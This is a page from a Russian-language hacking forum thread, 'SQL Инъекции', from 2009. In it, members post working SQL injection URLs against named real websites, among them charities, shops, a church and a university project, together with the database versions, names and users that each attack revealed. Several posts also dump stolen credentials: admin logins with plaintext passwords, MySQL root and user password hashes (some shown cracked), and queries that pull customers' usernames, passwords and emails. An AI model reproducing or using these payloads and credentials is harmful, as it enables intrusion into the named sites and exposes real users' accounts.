SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    V.O.I.A.C. Victims of Illegal Alien Crime
    Code:
    http://www.voiac.org/victims.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,concat(version(),0x3a,user(),0x3a,database()),45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--
    user(): [email protected]
    version(): db35080_voiac
    database(): 4.1.25-Debian_mt1


    Faith and Reason®
    Code:
    http://www.faithandreason.org/seminars.php?id=-11+union+select+1,2,concat(convert(version()+using+binary),0x3a,convert(user()+using+binary),0x3a,convert(database()+using+binary)),4,5--
    user(): lounge@localhost
    version(): lounge
    database(): 4.1.14
    PR=4
     
    #7701 z00MAN, 11 Feb 2009
    Last edited: 11 Feb 2009
  2. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://history.referama.ru/txt.php?str=1&srch=&ch=-3707%20union%20select%201,2,3,group_concat(table_name),5,6,7,8%20from%20information_schema.tables--

    ТЫц тыц =) ( у меня творческий кризис ))
     
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.obiectivdevaslui.ro/advertising.php?page=1&categories_id=-5+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11/*


    Version: 4.1.22-standard-log
    Database : irina11_obiectiv2008
    User : irina11_obiectiv@localhost
     
  4. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://www.kachnu.ru/txt.php?str=1&srch=&ch=-54%20union%20select%201,2,3,4,group_concat(table_name),6,7,8,9%20from%20information_schema.tables--

    5.0.32-Debian_7etch6-log
     
    2 people like this.
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.berta-art.com/news_details.php?lng=ro&page=&news_id=-5+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11&bertaAdminID=lfabj75f5tpli7bas74nqtj7onbukfso



    Version : 5.0.51a
    Database : berta_art_db
    User : berta_art_user@localhost
     
    1 person likes this.
  6. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    United Way Of Pioneer Valley
    Code:
    http://www.uwpv.org/?id=-11+union+select+concat(version(),0x3a,database(),0x3a,user())--
    user(): gounited@localhost
    database(): unitedbs
    version(): 4.1.20

    PR=5

    Bigg Boss 2 Official Site, Watch BiggBoss2 on Colors TV Daily at 10
    Code:
    http://www.biggboss2.in.com/contestants.php?id=-11+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5/*
    вывод в title
    user(): [email protected]
    database(): eon18tech2
    version(): 5.0.45-log

    PR=5
     
  7. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.aktas.lt/news/news_open.php?id=-1+union+select+1,2,3,concat_ ws(0x3a,version(), user(),database()),5,6--
    Database Version : 4.0.27-standard
    Database name : aktas_duombaze
    User name : aktas@localhost
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.angelhitomi.com/bbs/mex.php?id=-48+union+select+1,2,version(),4,5,6,7,8,9,10/*
    4.1.22-standard-log

    PR: 4
     
    _________________________
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://produsesiservicii.profitromania.ro/modul/?id_compan=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/*


    Version : 5.0.32-DEBIAN_7ETCH8-LOG
    Database : PROFIT
    User : PROFIT@LOCALHOST
     
    1 person likes this.
  10. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    www.incubator.tsu.ru PageRank: 3 тИЦ: 4700
    HTML:
    http://www.incubator.tsu.ru/contest/?org=3+union+select+1,2,3,4,5,6,7,8,9,group_concat(concat_ws(0x3A,username,user_password)+SEPARATOR+0x3c62723e),11+from+incubator_tsu_ru.phpbb_users+where+user_level=1--
    админка форума:
    http://www.incubator.tsu.ru/forum/admin/index.php
    -------------------------------------------------------------------------
    gwru.ru PageRank: 5 тИЦ: 500

    HTML:
    http://gwru.ru/world/base?id=-2378+union+select+1,concat_ws(0x3A,user(),@@version,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
     
    #7710 AkyHa_MaTaTa, 11 Feb 2009
    Last edited: 11 Feb 2009
    1 person likes this.
  11. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    www.rmz-kazan.ru

    юзер:
    БД:
     
  12. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Мобильный портал, а также магазин сотовых телефонов. PR - 4

    Code:
    http://www.o-connect.com/index.php?type=news&id=-1+union+select+concat_ ws(0x3a,version (),user(),database())--
    Database Version : 5.0.45
    Database name : oconn_oconnectdb
    User name : oconn_oconect@localhost


    хватаем узеров :
    Code:
     http://www.o-connect.com/index.php?type=news&id=-1+union+select+ concat_ws(0x3a,Username,Password)+from +tblendusers+limit+0,1--
    их около 1500 тысячи, пассы не захешированы ))
     
    #7712 f1ng3r, 12 Feb 2009
    Last edited: 12 Feb 2009
  13. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://www.hackleyhme.com/health.php?id=-1+union+select+1,2,concat_ws(0x3a,login,password),4+from+Admin--
    логин/пасс:
    Code:
    hme2003:w1nt3r
     
  14. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Даешь аниме нахаляву
    HTML:
    http://animefilm.biz/lib_object_view.php?o=-150'+union+select+concat_ws(0x3A,user(),version(),database()),2,3,4,5,6,7,8,9,10/*
    
     
    #7714 AkyHa_MaTaTa, 12 Feb 2009
    Last edited: 12 Feb 2009
  15. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Database Version: 5.0.54-log
    Database name: pocketmacsite
    User name: [email protected]


    Админы


    userid:password

    : admin : billy34b
    : shekhar : newdelhi
    : anne : paloma20




    Database Version: 5.0.67-community-log
    Database name: fazed
    User name: root@localhost


    root : *49D31C9CB8CACAC3832DCA30E2A09DD4F0A7E236



    Version:4.1.10-standard-log
    User:gazela_teses@localhost
    Database:gazela_teses


    Database Version: 5.0.26-standard-log
    Database name: ufcw1776_org
    User name: ufcw2@localhost


    Microsoft SQL Server 2005 - 9.00.2047.00 (Intel X86) Apr 14 2006 01:12:25 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1


    musgravew3


    musgrave.ie




    Version:5.0.32-Debian_7etch8-log
    User:cutefact_admin@localhost
    Database:pasen


    root: *3E3ACE7EDB1397754856E421374855C2B32DAA7C
    vftp: *8DC54F2E15823C98AEA063E339A5D4C53D1A471A
    debian-sys-maint: *BA2FFA1BFAD117D74877D6C5F238406F678F87E8
    cutefact_admin: *DEDA5FF13D1EAC8D04D2F5473D2FC9B26853A8B1
    syscp: *DEDA5FF13D1EAC8D04D2F5473D2FC9B26853A8B1



    Version:5.0.44-log
    User:freevstf@localhost
    Database:freevstf


    Боенги Боенги Боенги -)



    Version:4.0.27-max-log
    User:[email protected]
    Database:Crew747sp
     
    #7715 spherics, 12 Feb 2009
    Last edited: 12 Feb 2009
    3 people like this.
  16. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    images.ourontario.ca - PR4

    Code:
    http://images.ourontario.ca/oshawa/details.asp?ID=42587+or+42587=@@version--
    Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2
    Code:
    http://images.ourontario.ca/oshawa/details.asp?ID=42587+or+42587=(SELECT+system_user)--
    User: OntarioImagesRead
    Code:
    http://images.ourontario.ca/oshawa/details.asp?ID=42587+or+42587=(SELECT+db_name())--
    CurrentDB: OntarioImages
     
  17. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Ребята забираем еще один крупный проект.В общем продажа софта и игр под MAC итд

    Читалка хорошо работает в общем воть -)


    Database Version: 5.0.45-log
    Database name: webstore
    User name: store@localhost


    root : *382D915D57801D0868AC4A297D89D2E9A35BC63C
    gsreader : 10d4c3fb48035600 хэш MySQL : 10d4c3fb48035600 : ahoyhoy
    faq : 0fd091c1001b43cb
    gsutility : 6d2082810da205a0
    gsutility : 30e551d74aed5fad
    gsutility : 6d2082810da205a0
    mark : 7fa96784501c6d0b
    randy : 77eb75a607a7c821
    remy : 46b27126746b1141
    backup : 606706156665cd86 хэш MySQL : 606706156665cd86:x
    mt : *E09333E4221CB5EE5AB01170795377729CB5A146
    bhproje_freevers : 6d8369a953851a24 хэш MySQL : 6d8369a953851a24 : monkey
    ian : 4d9ff7ac381304d7


    bruce : 6d3d1ca975eb70e2
    mantis : 0128fa7460afd575
    fvreg : 5892ad7204422e2e
    hip : 6d3d1ca975eb70e2
    justind : 005746604607a15a
    cento : 49150a2950a14a25
    dave : 6d35f8b12448dddc
    brian : *8142E238D0E55344D43071D46CB971C502DD9395
    sudoku : 0da5e2fb69f306c9
    store : 509cafb91a21d6f9
    mint : 0e41167f3411dfe9 хэш MySQL : 0e41167f3411dfe9 : delicious
    liz : 7f8e913d229ded36 хэш MySQL : 7f8e913d229ded36 : callico
    macfun : 08961af77a9bde4d
    macfun_zen : 19bbd9cb1fe53a7b
    marktest : 389d6ae97d0fb1c0
    cento : 49150a2950a14a25
    kevin : 7ab1fc6a1e1a8a44
    statsmith : 029552ba79e3f778
    bc : 6d2082810da205a0
    store : *175B91F9A0B308D93247563A5E0B7B922927AD9F
    horling : 1203ae656937fcb4
    root : 072bc9bb579ed0ff




    Database Version: 5.0.22-community-nt
    Database name: aeromobile
    User name: aeromobileadmin@localhost


    : martin : 2mm
    : alex : CovertClose
     
    2 people like this.
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.ponturi.ro/subcat.php?idc=-9+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/*&ids=1&mod_afisare=2



    Database Version: 5.0.27
    Database name: ponturi
    User name: [email protected]
     
    1 person likes this.
  19. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.poveche.net/news.php?id=-1+union+select+1,2,3,concat_ ws(0x3a,version(),database (),user())--
    Database Version : 4.0.27-log
    Database name : bcaf
    User name : poveche@localhost



    Code:
    http://www.paragon-bg.com/news.php?id=-1+union+select+1,2,concat_ws(0x3a,version (), database(),user()),4,5,6--
    Database Version : 5.0.32-Debian_7etch8-log
    Database name : metasoft_paragon
    User name : paragon@localhost


    берем узверей:

    Code:
    http://www.paragon-bg.com/news.php?id=-1+union+select+1,2,concat _ws(0x3a,username,pswrd,email),4,5,6 +from+clients+limit+1,1--
    берем админа:

    Code:
    http://www.paragon-bg.com/news.php?id=-1+union+select+1,2,concat _ ws(0x3a,username,pswrd,privilegel),4,5,6 +from+clients+limit+0,1--
     
    #7719 f1ng3r, 12 Feb 2009
    Last edited: 12 Feb 2009
    2 people like this.
  20. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.clip-trade.ro/store/view.php?prod=4010063&brid=-2+UNION+SELECT+1,CONCAT_WS(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/*


    Version : 4.1.22-standard
    Database : cliptra_store
    User: cliptra_store@localhost
     
    2 people like this.
Thread Status:
Not open for further replies.